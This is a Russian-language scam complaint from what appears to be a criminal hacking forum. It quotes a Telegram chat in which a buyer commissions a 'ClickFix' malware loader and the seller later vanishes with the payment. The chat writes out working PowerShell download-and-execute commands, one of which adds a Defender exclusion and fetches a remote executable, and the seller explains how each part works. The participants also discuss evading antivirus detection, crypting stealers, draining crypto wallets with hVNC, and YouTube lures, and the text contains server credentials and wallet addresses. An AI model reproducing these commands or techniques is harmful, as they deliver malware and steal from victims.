- https://xss.pro/members/428204/
- Noor Asiah ник в TG
-
Код:
[*]Noor Asiah здарова 02:44 02:44 о кликфиксе говоришь же, верно? 02:45 имеются некие приватные решения, я профи в этой сфере, могу помочь 02:46 множество сделок в этом направлении, например вот 02:55 . . . Привет 02:55 In reply to this message Наверное, не очень знаю название ) 02:56 Noor Asiah да, это оно 02:56 . . . Че по чем 02:56 Noor Asiah подгрузка билдов через повершелл (win+r) 02:57 In reply to this message $350 готовое решение с гарантией 7д на детект дефендера 02:57 . . . Дай свои профили 02:57 Noor Asiah /members/428204/ 02:57 damaga 02:57 . . . Эксп или хсс 02:57 Noor Asiah xss 02:57 na expe net profilya 02:58 . . . ща чекну 02:58 Noor Asiah kk 03:02 . . . Вроде норм профиль, хз 03:03 У конкурентов кароче такая команда 03:03 powershell -command "$TradingView='start'+'devmode.'+'dev/0FS.lim';$f=$env:TEMP+'\'+[guid]::NewGuid().ToString()+'.ps1';[IO.File]::WriteAllText($f,[Text.Encoding]::UTF8.GetString((iwr $TradingView -UseBasicParsing).Content));powershell -w h -ep bypass -f $f" 03:03 Что по ней скажешь? 03:03 Нам делали раньше, но там была проблема с детектом дефа 03:03 На команду 03:03 In reply to this message Тут какие то девмоды появились, байпассы 03:03 Раньше такого не видел 03:03 Noor Asiah In reply to this message +- актуальная реализация на данный момент, могу расписать подробно, что она делает 03:03 . . . Давай 03:03 Интересно будет 03:08 Noor Asiah $TradingView='start'+'devmode.'+'dev/0FS.lim' формируется строка startdevmode.dev/0FS.lim - путь к файлу на сервере $f=$env:tEMP+'\'+[guid]::NewGuid().ToString()+'.ps1' генерация случайного названия файла+ps1 (формат) в папке %temp% [IO.File]::WriteAllText($f,[Text.Encoding]::UTF8.GetString((iwr$TradingView -UseBasicParsing).Content)) скачивается содержимое из startdevmode.dev/0FS.lim с помощью метода iwr (invoke web request) и сохраняет как UTF8 во временный файл powershell -w h -ep bypass -f $f запускает этот файл в памяти с скрытым окном (-w h) и обходит проверку выполнения кода (скрипта) (-ep bypass) 03:08 сейчас конкретно эта команда уже имеет практически постоянный детект, поэтому она "почти" актуальная 03:09 . . . Как понять почти актуальная? 03:09 Типо уже заюзанная много раз? 03:09 Noor Asiah да, имеет детекты, но не всегда 03:09 не на всех машинах* 03:09 . . . А как эти команды чистить вообще? 03:09 Noor Asiah новую создавать 03:10 например тут метод $tradingview 03:10 чем больше запутанных функций - тем выше вероятность обхода windef 03:10 powershell -nop -w hidden -c "Add-MpPreference -ExclusionPath $env:TEMP\sv-host.exe; iwr https://maimonidesway.org/sv-host.exe -OutFile $env:TEMP\sv-host.exe; Start-Process $env:TEMP\sv-host.exe 03:10 так выглядит +- базовая реализация 03:10 . . . In reply to this message И это каждый раз 03:11 По 350 отдавать? 03:11 Noor Asiah + 03:11 нет 03:11 . . . Так 03:11 Noor Asiah $30 замена, если прошел гарантийный срок (7 дней даю) 03:11 . . . И эту команду можно использовать вообще в любом русле, что нфт скам и тд 03:11 Noor Asiah + 03:11 . . . Ей похуй где располагаться 03:11 Интересно 03:11 Noor Asiah главное, чтобы юзер ввел ее в win+r 03:11 и все 03:12 . . . Да, но еще и видел 03:12 Вариацию 03:12 Noor Asiah методы реализации неважны при этом 03:12 . . . Что так же ее пихают в cmd 03:12 И она так же ворк 03:12 Noor Asiah да, можно так 03:12 это обычная повершелл команда 03:12 . . . Интересно 03:12 Думаю можно попробовать 03:13 Из расходников только сервер нужен ? 03:13 Качество крипта важно? 03:13 Noor Asiah In reply to this message ща покажу пример реализации 03:13 . . . Я просто юзаю o1oo1 крипт 03:13 3к$ в месяц которрый 03:13 По сабке 03:13 Потребности такого крутого крипта уже не особо, ушли от старого трафка 03:13 Думаю уйти на более бедный крипт 03:14 Noor Asiah ой, не то 03:15 https://www.youtube.com/watch?v=q3AT8eqcwoQ&source_ve_path=MTc4NDI0 03:15 тут пример именно реализации, команду не показывал ибо это демо 03:15 In reply to this message нет, не важно. если крипт умер - файл легко заменяется на сервере 03:16 за $3k точно не нужен, нет смысла тратить столько денег 03:16 гораздо проще будет заменять файл) 03:16 In reply to this message да, и желательно домен для траста 03:16 ибо сравнивали просто загрузку с айпи - детект появляется быстрее, нежели чем с доменом.. хз с чем связанно, но как факт 03:17 . . . In reply to this message А у них без домена вроде 03:17 Noor Asiah с доменом 03:17 In reply to this message вот 03:17 . . . Но его не видно 03:17 Типо скрыт по функцию? 03:17 Noor Asiah + 03:17 . . . И у нас так же будет? 03:17 Noor Asiah + 03:17 только не $tradingview 03:18 . . . А как 03:18 Noor Asiah другая реализация, но смысл тот же самый 03:18 In reply to this message ибо она щас детектится как clickfix в windef 03:18 . . . А если допустим TreadingViews 03:18 Тоже детект? 03:18 Noor Asiah такой нет 03:19 . . . Прингял 03:19 Ты вообще эту тему с трейдингвью проливом знаешь? 03:19 Мы просто все с зимы думали ей заняться, все никак руки не доходили 03:19 Даже интересно по профитности там как 03:19 С каналами траблов нет, есть много крупных пиздатых 03:19 На которые заливать можно 03:19 Видео актеров тоже есть 03:19 Noor Asiah In reply to this message да, я понял по био)) 03:20 . . . Я как понял, там базово заходит трафик с реков 03:20 Noor Asiah In reply to this message 50/50, ранее общался с людьми, что лили трейдингвью 03:20 . . . И вся суть в кошельках на отработке 03:20 Noor Asiah In reply to this message потом парень тг удалил и все, пропал контакт 03:20 . . . Ну и что вообще 03:20 Noor Asiah 03:20 . . . По настроению 03:20 В этой теме 03:21 Noor Asiah они насколько я помню точечно лили 03:21 через твиттер 03:21 говорил что заебись 03:21 . . . Я именно про ют, ибо там уже месяцев 6 03:21 Активно льют 03:21 Каждый день заливают каналы 03:21 И в какой то момент 03:21 Вообще 03:21 В апреле что ли 03:21 Они перебивали цены на каналы у криптостримеров 03:22 Что редкость 03:22 Noor Asiah по ютубу хз, не общался с людьми конкретно про трейдингвью 03:22 . . . Ибо у криптостримов в ютуб теме денег больше 03:22 Noor Asiah In reply to this message да, у меня есть знакомый (@hatezo), который перебивает цены за каналы 03:22 видимо то же льет, узнаю 03:22 . . . Видел его 03:22 С другого акка знакомы) 🔥 03:23 Noor Asiah я с ним хорошо общаюсь, наверное он так же трейдинг льет 03:23 узнаю, скажу 03:23 . . . Но сейчас льют бомжатню какую то 03:23 Типо 500 сабов каналы 03:23 1к 03:23 30к 03:23 Вообще дешевые 03:23 Какой там трафик ловить, хз 03:24 Щас тогда подумаем по команде 03:24 Ну ты утверждаешь, что будет все четко прям 03:24 Детектов не будет) 03:24 Noor Asiah да, 100% 03:24 . . . Круто, ща подумаем тогда 03:24 Ее не долго делать? 03:24 Noor Asiah пару часов с учетом тестов 03:25 . . . Щас ее льют на гитхаб как я понял 03:25 https://github.com/TradingViewCharts/dev/blob/main/enable 03:25 Но раньше 03:25 Пиздили сайты 03:25 Переделывали 03:25 Noor Asiah In reply to this message хз, он берет только лямники юсы 03:25 . . . И ставили свои 03:25 In reply to this message Понял 03:25 Узнай тогда точно 03:25 Что он льет 03:25 Интересно) 03:25 Noor Asiah кк 03:32 03:35 . . . Нихуйно 03:35 Нормально 03:35 Noor Asiah он там личное чуть-чуть написал, поэтому замазал, но не суть 03:35 . . . Да все равно спасибо 🔥 03:36 Бля кстати хвнц нормальное решение 03:36 Чем просто стиллер 03:37 Noor Asiah ну да, так намного проще логи налить 03:37 у него там хвнц еще какое-то не помню ебанутое чье то 03:37 . . . Бля помню раньше на экспе продавали топовое хвнц 03:37 Не помню уже даже ник продавца 03:37 Но его многие топы под ютуб логи брали 03:37 В день по 100+ каналов селлили 03:37 На 100к бачей 03:38 Кстати 03:38 Я еще заметил 03:38 03:38 Noor Asiah да, хвнц всегда заебись 03:38 . . . Тут упоминается макос 03:38 У них в команде еще подгрузка под мак что ли еще идет 03:38 Или это просто для понта написали 03:38 Noor Asiah конкретно в этой нет 03:38 . . . Значит для траста 03:38 Noor Asiah которую ты отправил и оставлял на дамаге (хсс) 03:38 но вообще такое возможно 03:38 только я не помню реализацию под .dmg 03:38 и нет возможности щас потестить, мак в ремонте 03:39 а так я и под мак делал 03:42 в общем если что - пиши, на связи 24/7 практически 03:52 . . . Да, я думаю возьмем 03:52 Все отлично расписал 04:00 Noor Asiah окей 04:00 напишешь тогда 14:18 Noor Asiah In reply to this message реализацию под .dmg на сервере нашел 14:18 только у меня нет возможности ее тестить 14:18 мак с ремонта через 2 недели ток отдадут 15:21 . . . Привет, принял Обсудил с командой, завтра возьмем у тебя команду ❤ 15:21 Будем все тестить и тд) 15:21 Так же, подскажи, куда лучше ее размещать что бы меньше ловила детект? Сейчас как вижу ее размещают на гитхаб 17:16 Noor Asiah In reply to this message окей 17:17 In reply to this message ближе к делу расскажу 🤝 17:17 гитхаб тоже клево, но есть более интересные варианты 16 August 2025 04:58 Noor Asiah привет, я если что на связи, жду фидбэка 20:42 . . . Ку 20:42 Оки 20:42 Отпиши мне пока в лс на хсс 20:43 Noor Asiah ок 20:43 . . . Для верифа 20:43 Noor Asiah продублируй профиль пожалуйста 20:43 . . . Ссылка не рядом, ник Rogue0M 20:44 Noor Asiah окей 20:52 22:34 Noor Asiah пойдет? 22:37 . . . Да думаю 22:37 Можно начинать 22:38 Noor Asiah ок 22:38 . . . Тебе нужен домен и хосты? 22:38 Noor Asiah da, server i domen 22:38 i file 22:38 i oplata (garant accepted) 22:51 sozdavat sdelky ? 22:52 . . . Домой еду 22:52 Минут 15 22:52 Noor Asiah okey 23:10 . . . Так 23:10 ТЫ хочешь гарант на xss сделать? 23:10 Noor Asiah да 23:15 . . . Бля 23:16 Для создания гранта просит 2Фа 23:16 А на создании 2Фа 23:16 Noor Asiah на эксп зайти не могу 23:17 сервер умер с акком 23:17 больше я хз гарант какой можно 23:17 . . . Да можно без гаранта 23:17 Noor Asiah у меня прост все норм 23:17 . . . Ты вроде в адеквате 23:17 Да и кто нынче будет скамить на 350 23:17 Смех же 23:19 Noor Asiah In reply to this message 23:19 😂😂 23:19 . . . 🫤 23:19 Noor Asiah ну я непротив в общем через гарант сделать, там вроде с клир версии включится totp (2fa) 23:19 а в целом как хочешь 23:20 файл+сервак еще не забудь 23:20 . . . Файл ща криптанем 23:20 Noor Asiah кк 23:20 . . . Бля интересно хвнц найти 23:20 Этого вандерфула 23:20 Ибо я чекнул темы 23:20 На бордах 23:20 х#йня какая то одна 23:20 Noor Asiah я спрашивал какое у него хвнц 23:20 он не говорит 23:20 . . . Не знаю даже, без хвнц есть ли смысл заливаться 23:20 Noor Asiah а какой стиллер у вас 23:20 . . . Но все равно, есть еще и другая тема, где пригодиться команда 23:21 In reply to this message Рада 23:21 Noor Asiah ну радамантус норм же 23:21 прост базара 0 с хвнц проще снимать кэш 23:21 . . . Ну в функциональности дело, я же как понимаю они через хвнц прям с его экрана могут за 5 секунд отправить его кэш на свой кош 23:21 Noor Asiah да 23:21 . . . А тут бля нужно брутить хуютить 23:21 И прочая тема 23:21 Но ладно, с хвнц разберемся может быть 23:21 Тааак 23:21 Хост 1 нужен? 23:21 Noor Asiah да 23:21 . . . На дефхосте могу взятьь 23:21 Что по параметрам 23:22 Noor Asiah любые вообще 23:22 . . . Ща возьму 23:22 Noor Asiah оттуда будет просто загрузка файла 23:22 поэтому подойдет самый нищий тариф* 23:24 . . . ОС какую 23:27 Домен рандом буквы и цифры? 23:27 Или под трейдинг вью че то взять 23:27 Noor Asiah в целом, без разницы 23:27 но можешь взять под трейдинг 23:27 In reply to this message любая 23:27 но лучше убунту 23:28 проще* 23:28 . . . In reply to this message Photo 293×73 23:28 Какую версию 23:28 Noor Asiah 22.04 23:28 а насчет домена, его все ровно не будет видно 23:28 . . . 24.04 еще есть 23:28 In reply to this message Оки 23:28 Noor Asiah 22.04 бери 23:28 новая неоч 23:36 . . . Так 23:36 Домен есть 23:36 Хост есть 23:36 Noor Asiah кк 23:36 . . . Данные от хоста кидать? 23:37 И доменом че делать 23:39 Noor Asiah я привяжу домен к серверу 23:39 поменяешь а записи просто 23:39 добавишь* 23:40 либо щас можешь добавить сразу 23:40 A @ ip servera A www ip servera 23:40 i vse 23:41 . . . 23:41 Это А запись 23:41 Как тут правильно все указать? 23:43 Noor Asiah ну вообще немного иначе должно быть 23:43 что это за регистратор 23:43 . . . regway 23:43 Вон А запись и ААА 23:45 Noor Asiah хост нейм пустой оставляй 23:45 ниже айпи адрес 23:45 ttl 3600 ставь 23:45 далее добавь вторую А запись 23:45 и в хост нейм впиши www 23:45 остальное тоже самое 23:46 . . . ААА значит не надо? 23:46 Noor Asiah + 23:46 . . . Вот первая 23:46 Noor Asiah да, верно 23:46 вторую так же 23:46 . . . Ток 7200 минимум 23:46 Noor Asiah ну оставь 7200 тогда 23:46 In reply to this message только в хостнейме www 23:46 . . . 23:47 Готово 23:47 Крипт тоже готов 23:47 .msi 23:51 Noor Asiah окей 23:51 давай данные от сервера, файл залей куда-нибудь на ФО 23:51 либо сюда архив+пароль 23:52 и куда удобно оплатить? 23:52 . . . eth 23:52 IP-адрес сервера: 62.60.226.225 Пользователь: root Пароль: i6U4n8LsP4P6 23:52 HCXGTPFN.rar Not included, change data exporting settings to download. 7.3 MB 2025 ⚡ 23:54 Noor Asiah 0x95080eFf95C0D5D7b4Df14Aab287D23fEEe39542 23:55 . . . 0x20b472a77184b599d04f52735a15c20706471500e7092626b2cbe649fc41d2b8 23:55 Ушли 23:55 Скок +- ждать? 23:56 Noor Asiah 2ч 23:56 с учетом тестов 23:56 возможность отстук проверить есть где? 23:56 забыл вообще об этом 23:56 . . . Да 23:56 На маршале 23:56 Или битлаунче могу взять 23:56 Noor Asiah да возьми 23:56 . . . Окей 23:56 Noor Asiah я забыл просто реально сказать изначально 23:56 из головы чет вылетело 23:56 что отстук надо потестить же 23:57 . . . Ну у меня на маршале есть сервер для тестов 23:57 Но ща еще возьму на битке 23:57 Noor Asiah да если есть 23:57 то можешь не брать 23:57 . . . А ок 23:57 Noor Asiah смысла 0 23:57 . . . Тебе нужны данные будут? Или мне посидеть потестить 23:57 Noor Asiah выдай креды от него 23:57 In reply to this message да 23:58 кэш пришел + 🤝 23:58 . . . IP-адрес: 83.217.208.144 Логин: Administrator Пароль: 🔥 23:58 Noor Asiah отпишу как стучать буду 23:59 . . . Оки 23:59 Слушай, мне потом возможно еще 2 команды нужны будут 23:59 Для коллег своих 23:59 Если эта заебись будет воркать, то еще возьму 23:59 Noor Asiah okey 17 August 2025 00:00 Noor Asiah nachal raboty 01:03 . . . Как успехи? 01:12 Noor Asiah good 01:12 щас отстук буду тестить 01:42 . . . Чет пока не пришел стук [*] - Я опубликовал тред для поиска исполнителя по изготовке команды clickfix, отписал данный человек, расписал всё и потребовал 350$, хотели регнуть гаранта, но форум мне не позволяет т-к требует 2ФА, но 2ФА не включается из-за технических работ. После чего человеку были отправленны 350$, он сразу начал морозить меня и нести бред, после чего пропал. На сервера которые ему были выданы, этот человек даже не зашел ниразу, после чего он удалил переписку для двоих, the end. На форуме он мне так же отписал вериф.